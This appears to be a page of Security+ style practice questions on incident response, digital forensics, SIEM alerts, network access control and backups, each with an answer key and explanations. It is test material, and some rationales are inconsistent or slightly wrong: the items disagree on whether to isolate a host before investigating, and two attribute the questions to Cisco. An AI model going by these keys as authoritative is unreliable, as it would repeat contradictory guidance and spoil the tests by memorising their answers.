Option C is correct because the first step in investigating an unknown encrypted outbound connection is to identify the process or service responsible for initiating it. Reviewing the server's process list and logs allows the analyst to determine whether the connection is legitimate (e.g., a scheduled update or backup) or malicious (e.g., a beacon from implanted malware). Without this visibility, actions like blocking or disconnecting could disrupt legitimate services or alert an attacker prematurely.

Exam trap

The trap here is that candidates often jump to containment (disconnect or block) without first performing local analysis, failing to recognize that the initial step in incident response is always identification and scoping before containment.

How to eliminate wrong answers

Option A is wrong because immediately disconnecting the server from the network is an aggressive containment step that should only be taken after confirming malicious activity; it can cause unnecessary downtime and data loss if the connection is benign. Option B is wrong because blocking the IP address at the perimeter firewall is a reactive measure that does not address the root cause—the unknown process on the server—and the attacker could simply use a different IP or domain. Option D is wrong because escalation to the incident response team is premature before gathering initial evidence; the analyst should first perform local investigation to confirm the nature of the connection and collect relevant data for a proper handoff.

126
Multi-Selecthard

An investigator receives a suspect laptop that may be needed in court. The goal is to create a forensic image without changing the original drive contents. Which three actions best support chain of custody and evidence integrity? Select three.

Select 3 answers
A.Use a hardware write blocker during acquisition so the original disk cannot be modified.
B.Record cryptographic hash values for both the original media and the forensic image.
C.Document every transfer of the laptop, including who had custody, when, and why.
D.Browse the original disk using the operating system file explorer to confirm the case folder is present.
E.Store the suspect drive and the forensic copy in the same unlocked folder to simplify access.
AnswersA, B, C

A write blocker prevents accidental or intentional writes to the original media during imaging. That is one of the most important controls for protecting evidence integrity. It helps show that the original drive remained unchanged while the forensic image was created.

Why this answer

A hardware write blocker is essential because it physically prevents any write commands from reaching the suspect drive at the SATA/IDE or USB level, ensuring the original disk's contents remain unaltered during acquisition. This is a foundational requirement for maintaining evidence integrity in forensic imaging, as any modification could render the evidence inadmissible in court.

Exam trap

The trap here is that candidates may think browsing the original disk is harmless or that storing evidence together is convenient, but both actions violate core forensic principles of preserving original evidence and maintaining a clear chain of custody.

127
Multi-Selecthard

A SIEM correlation rule fires for a Microsoft 365 executive mailbox. At 02:14, the account signs in from a new country. At 02:17, the mailbox gets a forwarding rule that sends all mail to an external address. The user says they did not travel and did not create any rules. Which two log sources should the analyst review first to confirm whether this is account takeover or token abuse? Select two.

Select 2 answers
A.Identity provider sign-in logs, because they show source IP, MFA status, and session creation details.
B.Mailbox audit logs, because they record rule creation, forwarding changes, and other post-login mail actions.
C.DHCP lease logs, because they identify the internal workstation that first received the suspicious email.
D.Print server logs, because mailbox forwarding often causes documents to be printed unexpectedly.
E.Physical badge-access logs, because they prove whether the user was in the office when the login occurred.
AnswersA, B

Identity provider sign-in logs are the fastest way to validate where the session came from, whether MFA succeeded, and whether a token or session was issued. That helps distinguish a legitimate login from suspicious access. They also provide the baseline needed to correlate later mailbox activity with the same identity.

Why this answer

Option A is correct because identity provider sign-in logs (e.g., Azure AD sign-in logs) capture the source IP address, MFA status, and session details. In this scenario, reviewing these logs can reveal if the sign-in at 02:14 came from an unusual IP or lacked MFA, indicating a potential account takeover rather than token abuse.

Exam trap

The trap here is that candidates may overlook the need to check both sign-in and mailbox audit logs, assuming one log source alone can distinguish between account takeover and token abuse, when in fact the combination of identity provider logs and mailbox audit logs is required to correlate the sign-in session with the rule creation action.

128
MCQmedium

A system administrator must run a weekly patch-and-restart job on 80 Linux servers without logging in interactively. The job should be repeatable, auditable, and limited to only the required maintenance commands. What is the best approach?

A.Share a root SSH key with the operations team so anyone can run the job.
B.Use a configuration management tool with a dedicated service account and restricted sudo permissions.
C.Have each administrator log in manually and run the commands from an interactive shell.
D.Create a local root account on every server for maintenance tasks.
AnswerB

This supports repeatable automation, centralized auditing, and least privilege by allowing only the needed maintenance actions.

Why this answer

B is correct because configuration management tools (e.g., Ansible, Puppet, or SaltStack) allow you to define a repeatable, auditable patch-and-restart job using a dedicated service account with restricted sudo permissions. This approach enforces the principle of least privilege, logs all actions via the tool's job history, and eliminates the need for interactive login, meeting all requirements for automation, auditability, and command restriction.

Exam trap

The trap here is that candidates may choose Option A (shared root SSH key) because it seems convenient for automation, but they overlook the critical security and auditability requirements that make configuration management with a restricted service account the only correct choice.

How to eliminate wrong answers

Option A is wrong because sharing a root SSH key violates the principle of least privilege and non-repudiation — anyone with the key can execute arbitrary commands as root without an audit trail of who ran what. Option C is wrong because manual interactive login on 80 servers is not repeatable, introduces human error, and fails to provide a centralized audit log; it also violates the requirement to avoid interactive login. Option D is wrong because creating a local root account on every server increases the attack surface, makes key management and auditing nearly impossible, and directly contradicts the need for a restricted, auditable process.

129
MCQmedium

A security analyst detects unusual outbound traffic from a workstation to an external IP address known for command and control. The analyst has verified the alert and wants to contain the threat. According to the NIST SP 800-61 incident response process, which of the following steps should the analyst take FIRST?

A.Disconnect the workstation from the network
B.Perform a forensic analysis of the workstation
C.Reimage the workstation
D.Alert the system administrator
AnswerA

This is correct because it directly implements containment by isolating the compromised workstation, preventing further data exfiltration or lateral movement.

Why this answer

According to NIST SP 800-61, the first step in containment during incident response is to prevent further damage by isolating the compromised system. Disconnecting the workstation from the network immediately stops the outbound command-and-control traffic, preventing data exfiltration and further compromise. This aligns with the 'containment' phase before any analysis or remediation occurs.

Exam trap

The trap here is that candidates often confuse the order of incident response phases, choosing forensic analysis (Option B) first instead of containment, because they mistakenly believe evidence preservation must precede network isolation.

How to eliminate wrong answers

Option B is wrong because performing a forensic analysis is part of the 'eradication' or 'post-incident' phase, not the first containment step; analyzing the system while it is still connected risks further data loss or attacker interference. Option C is wrong because reimaging the workstation destroys evidence and is a remediation step that should only occur after containment and forensic preservation. Option D is wrong because alerting the system administrator is a communication step that may happen in parallel, but the immediate technical containment action—disconnecting the network—takes priority to stop active malicious traffic.

130
MCQmedium

A security analyst notices unusual outbound traffic from a server that normally only communicates with internal clients. The traffic is encrypted and goes to an external IP address not on any blocklists. The analyst also finds a new scheduled task on the server that runs a PowerShell script. Which of the following best describes the analyst's immediate next step in the incident response process?

A.Disconnect the server from the network to contain the potential breach.
B.Wipe the server and restore from a known good backup.
C.Run a full antivirus scan on the server to identify malware.
D.Inform the legal department and law enforcement.
AnswerA

This is correct because containment is the immediate priority in incident response to stop the threat from spreading or causing more harm. Disconnecting the network cable or disabling the network interface is a simple and effective containment action.

Why this answer

According to standard incident response frameworks such as NIST SP 800-61, containment is one of the first and most critical steps after detecting a potential compromise. The unusual encrypted outbound traffic and the unauthorized scheduled task are strong indicators of compromise (IOCs). Disconnecting the server from the network immediately helps prevent further data exfiltration, lateral movement, or additional damage.

Other actions, such as running a scan, wiping the server, or notifying legal, are performed later in the process after containment and evidence preservation.

131
MCQeasy

A laptop is suspected of being compromised, and the responder wants to preserve useful evidence before shutting it down. What should be done first?

A.Power off the laptop immediately to stop all attacker activity.
B.Capture volatile data such as memory and running processes if possible.
C.Install a new antivirus product before collecting evidence.
D.Reimage the laptop so the user can return to work quickly.
AnswerB

Capturing volatile data is the best first step when preserving evidence matters. Memory can contain malware code, encryption keys, active network sessions, and signs of lateral movement that disappear after shutdown. In incident response, responders try to preserve the most time-sensitive evidence before disrupting the system, as long as doing so is safe and approved.

Why this answer

Option B is correct because volatile data (e.g., RAM contents, running processes, network connections) is lost when the laptop is powered off. Capturing this data first preserves critical evidence of the attacker's current activity, such as malware in memory or active network connections, which is essential for forensic analysis. This aligns with the forensic principle of order of volatility, where the most volatile data is collected first.

Exam trap

The trap here is that candidates often think immediate shutdown stops the attack, but CompTIA tests the forensic principle that volatile data must be captured first to preserve evidence that disappears on power loss.

How to eliminate wrong answers

Option A is wrong because immediately powering off the laptop destroys volatile data (e.g., memory, running processes, network connections) that may contain critical evidence of the compromise, such as active malware or attacker commands. Option C is wrong because installing a new antivirus product modifies the system state (e.g., writes files, changes registry entries), potentially overwriting or destroying existing evidence, and is not a forensic best practice. Option D is wrong because reimaging the laptop completely wipes all data, including evidence of the compromise, making forensic analysis impossible and violating evidence preservation protocols.

132
Multi-Selectmedium

A SIEM rule flags a Linux server because it makes outbound HTTPS connections to the same cloud IP every 15 minutes. The server runs an approved patch agent that should check in on a regular schedule. Which two checks best validate whether the alert is a false positive? Select two.

Select 2 answers
A.Compare the process name, parent process, and digital signature to the approved agent baseline.
B.Verify the destination domain and certificate chain against vendor documentation.
C.Assume the traffic is benign because it happens on a fixed schedule.
D.Suppress all alerts from the host permanently after this one event.
E.Stop collecting logs from the server so the same alert does not recur.
AnswersA, B

Correct because a known process tree and valid signature are strong indicators that the behavior belongs to the sanctioned patch agent. This helps confirm whether the activity matches expected system behavior.

Why this answer

Option A is correct because comparing the process name, parent process, and digital signature against the approved agent baseline directly validates that the traffic originates from the legitimate patch agent and not from malware masquerading as the agent. This is a standard host-based validation technique to confirm the source process integrity before investigating network alerts.

Exam trap

The trap here is that candidates may think a fixed schedule alone is sufficient to dismiss the alert (Option C), but CompTIA expects you to validate both the source process integrity and the destination legitimacy before concluding a false positive.

133
MCQeasy

Before applying a critical patch to a production application server, which action best reduces the risk of extended downtime if the patch fails?

A.Apply the patch immediately without testing so the system is protected sooner.
B.Create a verified backup or rollback plan before making the change.
C.Disable logging so the patch process uses fewer resources.
D.Postpone the patch indefinitely until all business users request it.
AnswerB

A verified backup or rollback plan is the best safeguard because it gives the team a way to recover quickly if the patch causes instability. In patch management, resilience matters as much as speed. Planning for restoration before the change reduces downtime, supports change control, and helps the business continue operating if the update introduces problems.

Why this answer

Creating a verified backup or rollback plan before applying a critical patch ensures that if the patch causes unexpected failures or incompatibilities, the system can be restored to its previous stable state quickly. This directly reduces the risk of extended downtime by providing a reliable recovery path, which is a fundamental principle of change management and risk mitigation in production environments.

Exam trap

The trap here is that candidates may think immediate patching (Option A) is always the best security practice, but the question specifically asks about reducing the risk of extended downtime if the patch fails, not about security speed, so the correct answer focuses on recovery preparedness.

How to eliminate wrong answers

Option A is wrong because applying the patch immediately without testing bypasses validation and increases the likelihood of a failure that could cause extended downtime, as there is no rollback plan or backup to recover from. Option C is wrong because disabling logging does not reduce downtime risk; it actually hinders troubleshooting by removing forensic evidence needed to diagnose patch failures, and resource savings are negligible compared to the risk of extended outage. Option D is wrong because postponing the patch indefinitely leaves the system vulnerable to known exploits, and waiting for all business users to request it is impractical and violates security best practices for timely patch management.

134
MCQmedium

A help desk technician reports that a user's account was locked out three times overnight. The security team reviews the authentication logs and discovers that the lockouts resulted from failed login attempts originating from a single external IP address, each attempt using a slightly different variation of the user's password. Which of the following should the security analyst do FIRST?

A.Block the external IP address at the perimeter firewall.
B.Disable the user account and require a password reset.
C.Investigate the user's recent activity for signs of compromise.
D.Increase the account lockout threshold to prevent future lockouts.
AnswerC

Correct. The analyst should first gather contextual information about the user's account, recent successful logins, and any other anomalous behavior. This investigation determines whether the account was actually breached and informs subsequent containment and remediation steps.

Why this answer

Option C is correct because the pattern of failed login attempts from a single external IP using password variations suggests a brute-force or password-spraying attack. The security analyst must first investigate the user's recent activity to determine if the account was successfully compromised or if the attacker gained access via a successful login attempt before the lockouts occurred. This aligns with the incident response process, where identification and analysis precede containment actions like blocking IPs or resetting passwords.

Exam trap

The trap here is that candidates may jump to immediate containment (blocking the IP or disabling the account) without first verifying whether the attack succeeded, which violates the incident response principle of 'identify before contain' and could disrupt legitimate access or miss evidence of a breach.

How to eliminate wrong answers

Option A is wrong because blocking the external IP at the perimeter firewall is a containment step that should be taken after confirming the attack is malicious and not a false positive (e.g., a legitimate user with a forgotten password). Option B is wrong because disabling the user account and requiring a password reset is premature without first verifying that the account was actually compromised; the lockouts may have prevented any unauthorized access. Option D is wrong because increasing the account lockout threshold weakens security posture and does not address the root cause; it may allow more brute-force attempts before lockout, increasing the risk of successful password guessing.

135
Multi-Selectmedium

A finance workstation is suspected of running malware. It is still powered on, the user is logged in, and the network cable is connected. Which two actions best preserve volatile evidence before shutdown? Select two.

Select 2 answers
A.Capture RAM or a volatile memory image before the system is powered off
B.Record running processes, open network connections, and logged-on users
C.Shut the workstation down immediately and restart it cleanly
D.Run a disk defragmentation utility to prepare for imaging
E.Uninstall the suspected malware before collecting any evidence
AnswersA, B

Memory can contain running processes, network sessions, encryption keys, and malware artifacts that disappear on shutdown.

Why this answer

Option A is correct because capturing RAM or a volatile memory image preserves data that is lost when the system is powered off, such as running processes, encryption keys, and network connections. This is a fundamental step in forensic incident response to ensure volatile evidence is not destroyed before analysis.

Exam trap

The trap here is that candidates may think immediate shutdown is safe or that disk defragmentation is a valid preparation step, but both destroy or alter evidence, violating forensic preservation principles.

136
MCQmedium

An EDR console alerts that powershell.exe launched with an encoded command on a finance workstation, and a minute later the host begins making repeated outbound connections to an unfamiliar IP address. What is the best initial response?

A.Run a full antivirus scan first and leave the workstation online so the user can keep working.
B.Isolate the workstation through the EDR platform and preserve logs and volatile evidence for investigation.
C.Power off the workstation immediately to ensure the malicious process stops.
D.Create a permanent firewall rule that allows the unfamiliar IP address so you can observe more traffic.
AnswerB

Encoded PowerShell combined with outbound beaconing is a strong indicator of active malicious behavior. Isolating the endpoint through EDR contains the incident while preserving the host’s state for analysis. This approach is better than pulling the plug because it reduces attacker activity without unnecessarily destroying volatile evidence. The analyst can then collect logs, memory, and process details before remediation or reimaging.

Why this answer

Option B is correct because isolating the workstation via the EDR platform stops the immediate threat (the malicious outbound connections) while preserving volatile evidence (e.g., running processes, network connections, memory contents) and logs for forensic analysis. This aligns with the incident response principle of containment before eradication, and EDR isolation typically uses a host-based firewall rule to block all traffic except to the EDR management server, ensuring the host remains accessible for investigation.

Exam trap

The trap here is that candidates confuse immediate containment (isolation) with eradication (antivirus scan) or evidence preservation (shutdown), but the SY0-701 emphasizes that isolation via EDR is the best initial response because it stops the threat without destroying volatile data.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan while the host remains online allows the attacker to continue exfiltration or lateral movement, and antivirus may miss fileless or encoded PowerShell attacks that never touch disk. Option C is wrong because powering off the workstation destroys volatile evidence (e.g., memory-resident malware, active network connections, process trees) and may prevent forensic analysis of the attack chain. Option D is wrong because creating a permanent firewall rule to allow the unfamiliar IP address would actively assist the attacker by ensuring uninterrupted command-and-control communication, violating the containment principle.

137
Multi-Selecthard

A SOC analyst reviews an EDR alert showing powershell.exe launched with an encoded command, then immediately connected to an unfamiliar IP address and spawned rundll32.exe. The user is still logged in and the machine may still contain evidence needed for investigation. Which two actions should the analyst take first to contain the incident while preserving evidence? Select two.

Select 2 answers
A.Isolate the endpoint using EDR network containment or a quarantine policy.
B.Disable the user account and revoke active sessions or tokens for that identity.
C.Reboot the workstation immediately to clear any malicious process from memory.
D.Run a full vulnerability scan before taking any other action.
E.Delete the suspicious email from the mailbox to remove the original payload.
AnswersA, B

This stops the suspected malware from communicating or spreading while preserving the disk and volatile evidence for later analysis.

Why this answer

Option A is correct because isolating the endpoint via EDR network containment or quarantine policy immediately stops the malicious process from communicating with the command-and-control (C2) server at the unfamiliar IP address, preventing data exfiltration and lateral movement. This action preserves the volatile evidence in memory (e.g., the spawned rundll32.exe process) and on disk, allowing forensic analysis without the risk of the attacker destroying evidence remotely.

Exam trap

The trap here is that candidates often choose to reboot the workstation (Option C) thinking it will 'clean' the system, but this destroys volatile evidence and does not contain the incident, whereas disabling the user account (Option B) is a valid containment step to prevent further access via that identity.

138
Multi-Selectmedium

A legacy application server has a critical vulnerability, but the vendor will not release a fix for 30 days. Which two compensating controls are the best short-term risk reduction steps? Select two.

Select 2 answers
A.Restrict access to the server to known admin IPs or a jump host.
B.Place a web application firewall or IPS rule in front of the exposed service.
C.Document the issue and wait for the vendor patch without making any changes.
D.Open the service to more networks so monitoring tools can see it better.
E.Disable logging to reduce the performance overhead caused by the vulnerability.
AnswersA, B

Correct because limiting who can reach the server reduces exposure while the vulnerability remains unpatched. Fewer reachable sources means fewer opportunities for exploitation.

Why this answer

Option A is correct because restricting access to the server to known admin IPs or a jump host reduces the attack surface by limiting who can reach the vulnerable service. This network-layer control (e.g., using ACLs or firewall rules) prevents exploitation from untrusted sources while the vendor patch is pending. It is a classic compensating control that buys time without modifying the application itself.

Exam trap

The trap here is that candidates may think documenting the issue (Option C) is sufficient or that increasing monitoring (Option D) is a control, but CompTIA expects active risk reduction measures like access restriction and virtual patching, not passive or counterproductive actions.

139
MCQmedium

An IDS raises an alert for a possible SQL injection attack against an internal reporting portal. The web server logs show the source IP belongs to the company's vulnerability scanner, and the requests match the scanner's normal test pattern. What is the most appropriate analyst action?

A.Treat the alert as a confirmed breach and begin password resets for all portal users.
B.Mark the alert as a likely false positive after verifying the scanner schedule and source IP.
C.Block the scanner IP permanently to prevent future alerts from the same host.
D.Quarantine the reporting server because IDS alerts always indicate active exploitation.
AnswerB

Authorized scanners often resemble attacks, so confirming the source and schedule is the right validation step.

Why this answer

Option B is correct because the IDS alert matches the known behavior of the company's vulnerability scanner, which is a legitimate and scheduled security tool. Verifying the scanner schedule and source IP confirms the traffic is authorized, making the alert a false positive. Analysts should correlate IDS alerts with asset inventories and change management records to avoid unnecessary incident response actions.

Exam trap

The trap here is that candidates may assume any SQL injection pattern in IDS logs is malicious, overlooking the possibility that the traffic originates from an authorized internal security tool.

How to eliminate wrong answers

Option A is wrong because treating the alert as a confirmed breach without verification wastes resources and causes unnecessary user disruption; IDS alerts require validation before escalation. Option C is wrong because permanently blocking the scanner IP would disrupt legitimate security testing and vulnerability management processes. Option D is wrong because quarantining the server based solely on an IDS alert ignores the context that the traffic is from an authorized scanner; IDS alerts can be false positives and do not always indicate active exploitation.

140
MCQeasy

Based on the exhibit, which tool should the security team use to safely observe the attachment's behavior before delivery to users?

A.Sandboxing, so the file can execute in a controlled environment before release.
B.DLP, so the gateway can block sensitive data from leaving the organization.
C.NAC, so the sender's device can be checked before the message is accepted.
D.SIEM, so the team can store the attachment and review alerts later.
AnswerA

Sandboxing is designed to detonate suspicious files safely and observe their behavior. Because the attachment is a macro-enabled spreadsheet and static scanning did not find a known signature, dynamic analysis is the right next step. This helps confirm whether the file tries to drop malware, contact an external server, or modify the system.

Why this answer

Sandboxing allows the security team to execute the attachment in a controlled, isolated environment to observe its behavior (e.g., network connections, file modifications) without risking the production network. This is the correct approach because it safely detonates the file before delivery, enabling detection of malicious activity such as ransomware or trojans. Other tools like DLP, NAC, or SIEM do not provide the dynamic analysis needed to assess the attachment's runtime behavior.

Exam trap

The trap here is that candidates may confuse sandboxing with DLP or SIEM, thinking that blocking data exfiltration or reviewing logs after delivery is sufficient, when the question specifically requires observing behavior before delivery.

How to eliminate wrong answers

Option B (DLP) is wrong because Data Loss Prevention focuses on monitoring and blocking sensitive data exfiltration, not on analyzing the behavior of an attachment for malware. Option C (NAC) is wrong because Network Access Control checks the security posture of a device before granting network access, not the content or behavior of an attachment in an email. Option D (SIEM) is wrong because a Security Information and Event Management system aggregates and correlates logs for analysis, but it cannot safely execute or observe the runtime behavior of an attachment before delivery.

141
MCQmedium

A hardening script is pushed to a production web server and, within minutes, the application stops accepting secure connections. The team discovers the script disabled a required TLS setting that the legacy application still needs. What should have been in place to reduce the impact of this change?

A.A documented change window with testing in a staging environment and a rollback plan.
B.A longer password policy for administrators so they can log in after the outage.
C.Disabling all logging during the change so the application can restart faster.
D.Replacing the web server hardware to ensure the TLS settings are applied correctly.
AnswerA

This is the best control because it reduces operational risk before a production change is made. Testing and rollback planning are standard safeguards when security hardening may affect availability.

Why this answer

Option A is correct because a documented change window with testing in a staging environment and a rollback plan ensures that changes are validated before production deployment. In this scenario, the hardening script disabled a required TLS setting (e.g., TLS 1.0 or a specific cipher suite) that the legacy application depended on. Testing in staging would have caught the incompatibility, and a rollback plan would allow reverting the change quickly, minimizing downtime.

Exam trap

The trap here is that candidates might think the issue is about authentication (Option B) or hardware (Option D), but the core problem is a configuration change that broke TLS compatibility, which requires proper change management and testing, not hardware or password policies.

How to eliminate wrong answers

Option B is wrong because a longer password policy for administrators does not address the technical issue of a misconfigured TLS setting; it only affects authentication, not the secure connection failure. Option C is wrong because disabling logging during the change does not help the application restart faster or prevent the TLS misconfiguration; logging is unrelated to the TLS stack or service recovery. Option D is wrong because replacing the web server hardware does not affect TLS settings; TLS configuration is software-based (e.g., in the web server's config files or registry), and hardware replacement would not resolve a misapplied script.

142
MCQeasy

A SIEM alert shows a workstation connecting to the same unknown internet address every 15 minutes, even after business hours. The device belongs to an employee who is on vacation. What is the best next step for the analyst?

A.Dismiss the alert because periodic connections are always normal for workstations.
B.Treat the alert as potentially malicious and check endpoint and proxy logs for more context.
C.Immediately delete the workstation account from the directory service.
D.Shut down the entire office network until the analyst can review the alert.
AnswerB

Unknown periodic outbound traffic can indicate beaconing, so additional log review is the right next step.

Why this answer

Option B is correct because the alert describes a persistent outbound connection to an unknown external IP address at regular intervals, which is a classic indicator of beaconing behavior often associated with malware command-and-control (C2) traffic. The fact that the connection occurs after business hours and the workstation's user is on vacation increases suspicion, as legitimate scheduled tasks or updates would typically not run under those conditions. Checking endpoint and proxy logs provides the necessary context to determine if the traffic is benign (e.g., a misconfigured service) or malicious (e.g., C2 communication).

Exam trap

The trap here is that candidates may assume periodic connections are always benign (e.g., Windows Update or NTP sync) and dismiss the alert, failing to recognize that the regularity, unknown destination, and user-on-vacation context are red flags for malicious C2 activity.

How to eliminate wrong answers

Option A is wrong because periodic connections are not always normal; beaconing at fixed intervals to an unknown external address is a well-known indicator of compromise (IoC) in security monitoring, and dismissing it outright violates standard incident response procedures. Option C is wrong because immediately deleting the workstation account from the directory service is a drastic, irreversible action that could disrupt legitimate operations and destroy forensic evidence; the proper first step is to gather additional context before taking containment actions.

143
MCQmedium

Facilities sees occasional water droplets forming above the cable trays in a data room during humid afternoons. The team wants the earliest possible warning before equipment is damaged. Which control should be added?

A.Motion detectors connected to the alarm panel.
B.Water leak sensors tied to environmental monitoring.
C.Badge readers on the room entrance only.
D.Fire suppression tests scheduled more frequently.
AnswerB

Leak or moisture sensors provide early detection of water intrusion so staff can respond before equipment is harmed.

Why this answer

Water leak sensors tied to environmental monitoring provide the earliest possible warning by detecting moisture directly on or near the cable trays. Unlike motion detectors or badge readers, these sensors are specifically designed to alert before water reaches sensitive equipment, enabling proactive remediation.

Exam trap

The trap here is that candidates may confuse physical security controls (motion detectors, badge readers) with environmental monitoring controls, overlooking that water damage requires specific moisture detection rather than access or motion sensing.

How to eliminate wrong answers

Option A is wrong because motion detectors detect movement, not water, and would not provide any warning about condensation or leaks. Option C is wrong because badge readers control physical access to the room but cannot detect environmental conditions like humidity or water. Option D is wrong because fire suppression tests are unrelated to water detection and do not address the condensation issue; they focus on fire safety, not moisture monitoring.

144
Multi-Selecthard

A SIEM correlates the following: 17 failed logons against the same VPN account from one IP in 9 minutes, a successful login from that IP, creation of a new API token in the SaaS tenant, and a large export job started two minutes later. Which two interpretations are best supported? Select two.

Select 2 answers
A.The attacker is likely performing a brute-force password attack against a single account.
B.The pattern is most consistent with password spraying across many accounts.
C.The account is likely compromised and being used for token abuse or persistence.
D.The events primarily indicate a volumetric denial-of-service attack.
E.Token creation proves the account password was never exposed.
AnswersA, C

Repeated failures focused on one account from one source fit brute-force guessing against a specific target.

Why this answer

A is correct because 17 failed logons against a single VPN account from one IP in 9 minutes is a classic brute-force pattern—repeated authentication attempts targeting one username. The subsequent successful login, API token creation, and data export indicate the attacker gained access and then established persistence (via the token) to exfiltrate data, confirming the account was compromised.

Exam trap

The trap here is confusing a single-account brute-force with password spraying—candidates often misidentify the pattern because they see multiple failed logons and assume many accounts are targeted, but the key is the same account and same IP over a short window.

145
Multi-Selectmedium

A ransomware incident encrypted a file share and the attached NAS backups because the NAS stayed mounted to production and was reachable over SMB. Which two design changes would have reduced the blast radius most effectively? Select two.

Select 2 answers
A.Keep at least one backup copy offline or immutable.
B.Use a separate backup account and a restricted backup network segment.
C.Mount the backup share permanently so restores are always faster.
D.Join the NAS to the same administrative group used by production servers.
E.Disable restore testing to avoid risking the backup environment.
AnswersA, B

Correct because an offline or immutable backup cannot be encrypted or deleted as easily by ransomware. It preserves a clean recovery point even if the production environment is fully compromised.

Why this answer

Option A is correct because keeping at least one backup copy offline or immutable ensures that even if the primary storage and network-attached backups are compromised, the offline or immutable copy remains intact and recoverable. In this scenario, the NAS was mounted and reachable over SMB, allowing ransomware to encrypt both the production share and the backup target. An immutable backup (e.g., using WORM storage or object lock) cannot be modified or deleted by the ransomware, breaking the encryption chain and preserving a clean recovery point.

Exam trap

Cisco often tests the misconception that mounting backups permanently improves recovery speed without considering the security trade-off, leading candidates to choose Option C instead of recognizing that offline or immutable backups are the primary defense against ransomware propagation.

146
Multi-Selectmedium

An EDR alert shows winword.exe launching powershell.exe with an encoded command after a user opened an invoice attachment. No new executable file was written to disk, and the host is still online. Which two actions should the SOC analyst take first to validate the alert and collect usable evidence? Select two.

Select 2 answers
A.Review the parent-child process chain and the full PowerShell command line in EDR.
B.Compare the endpoint's outbound connections with its normal baseline and approved destinations.
C.Reimage the workstation immediately to eliminate any possible persistence.
D.Ask the user to delete the suspicious email and clear the recycle bin.
E.Check PowerShell script block logs, AMSI detections, and related event records on the endpoint.
AnswersA, E

This shows whether the alert is truly a suspicious macro-to-PowerShell execution chain and reveals the exact command arguments used.

Why this answer

Option A is correct because reviewing the parent-child process chain (winword.exe → powershell.exe) and the full PowerShell command line in the EDR allows the analyst to immediately validate whether the alert is a true positive by confirming the process lineage and decoding the encoded command. This step is critical for understanding the attacker's intent without relying on disk artifacts, as the attack is fileless and memory-resident.

Exam trap

The trap here is that candidates may think reimaging or deleting the email is a valid containment step, but the question specifically asks for actions to validate the alert and collect usable evidence, not to contain or remediate.

147
MCQmedium

At 10:15, a file server begins renaming documents and creating payment notes. The SOC confirms the server is also making SMB connections to other internal hosts, but users can still access shared folders. What should the incident handler do FIRST?

A.Disconnect the server from the network or isolate it through EDR containment while preserving power
B.Shut down the server immediately to stop all malicious activity
C.Restore the server from backup before taking any other action
D.Wait for users to report more symptoms before responding
AnswerA

Immediate containment stops lateral movement and further encryption while preserving the system for investigation and evidence collection.

Why this answer

The correct first step is to contain the incident by disconnecting the server from the network or using EDR containment while preserving power. This stops the spread of malicious SMB connections and prevents further damage, while keeping the system powered on to preserve volatile evidence (e.g., memory, running processes) for forensic analysis. Immediate containment aligns with the NIST incident response framework's containment phase, prioritizing isolation over eradication or recovery.

Exam trap

The trap here is that candidates may choose to shut down the server (Option B) thinking it stops the attack, but CompTIA emphasizes preserving power and evidence for forensic analysis, making isolation the correct first step.

How to eliminate wrong answers

Option B is wrong because shutting down the server destroys volatile evidence (e.g., memory contents, active network connections) and may allow malware to persist or trigger destructive payloads on reboot. Option C is wrong because restoring from backup before containment could re-infect the network if the backup is compromised, and it skips the critical step of preserving evidence. Option D is wrong because waiting for more symptoms allows the attacker to move laterally via SMB, encrypt more files, or exfiltrate data, violating the principle of rapid containment.

148
Multi-Selectmedium

An organization is implementing a Security Information and Event Management (SIEM) system to enhance its security monitoring capabilities. Which four of the following are primary functions of a SIEM? (Choose four.)

Select 4 answers
.Correlation of log data from multiple sources
.Real-time alerting on security events
.Centralized log storage and retention
.Automated threat intelligence feed integration
.Vulnerability scanning and patch management
.In-line network traffic blocking

Why this answer

A SIEM's primary functions include correlation of log data from multiple sources to identify patterns and anomalies, real-time alerting on security events to enable immediate response, centralized log storage and retention for compliance and forensic analysis, and automated threat intelligence feed integration to enrich event data with known indicators of compromise (IOCs). These capabilities collectively provide comprehensive security monitoring and incident detection.

Exam trap

Cisco often tests the misconception that a SIEM can actively block traffic or perform vulnerability scanning, but in reality, a SIEM is a passive monitoring and analysis tool that does not execute remediation actions or network-level blocking.

149
MCQmedium

A contractor connects a personal tablet to a lobby Ethernet jack. The network team wants the device blocked from internal resources until it passes posture checks and only guest access is allowed meanwhile. Which control best fits?

A.A data loss prevention platform that inspects file transfers.
B.Network access control that verifies the device before granting access.
C.A network intrusion detection system placed inline at the switch.
D.A VPN concentrator that encrypts remote traffic back to headquarters.
AnswerB

NAC is designed to admit, deny, or segment devices based on identity, posture, and policy before they reach internal resources.

Why this answer

Network Access Control (NAC) is the correct solution because it enforces security policies by checking a device's compliance (e.g., antivirus, patch level) before granting access to internal resources. In this scenario, the contractor's tablet is initially placed on a guest VLAN with internet-only access until posture checks pass, which is a core NAC function (e.g., using 802.1X or MAC authentication bypass).

Exam trap

The trap here is confusing NAC with a NIDS or DLP, because candidates often think 'blocking' requires an inline security appliance, but NAC uses switch-level VLAN assignment and 802.1X to enforce policy without inspecting content.

How to eliminate wrong answers

Option A is wrong because a Data Loss Prevention (DLP) platform inspects data in motion or at rest to prevent leaks, not to enforce pre-admission posture checks or VLAN assignment. Option C is wrong because a Network Intrusion Detection System (NIDS) monitors traffic for malicious patterns but does not block or quarantine devices based on compliance status; it is passive and cannot enforce guest-only access. Option D is wrong because a VPN concentrator encrypts remote traffic but does not perform device posture assessment or control local network segmentation before access is granted.

150
MCQmedium

After a ransomware event, management wants proof that last night's backups can actually support business operations before they declare recovery complete. What is the best action?

A.Perform a test restore into an isolated environment and validate the files or application work correctly.
B.Increase the backup retention period without testing the backups.
C.Copy the backup set to a new storage bucket and assume it is usable.
D.Run a vulnerability scan against the backup server.
AnswerA

A test restore is the only option that proves the backup can actually be recovered and used. By restoring into an isolated environment, the team avoids contaminating production while still confirming that data, permissions, and the application behave as expected. This also helps validate recovery objectives and exposes problems such as corrupted backups, missing dependencies, or failed restore procedures before a real outage occurs.

Why this answer

Option A is correct because performing a test restore into an isolated environment directly validates that the backup data is intact, the restore process works, and the restored files or applications function as expected. This provides management with the proof they need to confirm business operations can resume, which is the core requirement after a ransomware event.

Exam trap

The trap here is that candidates may confuse backup management tasks (like retention or copying) with actual recovery validation, or think that security scanning proves backup usability, when only a functional test restore provides the required proof of operability.

How to eliminate wrong answers

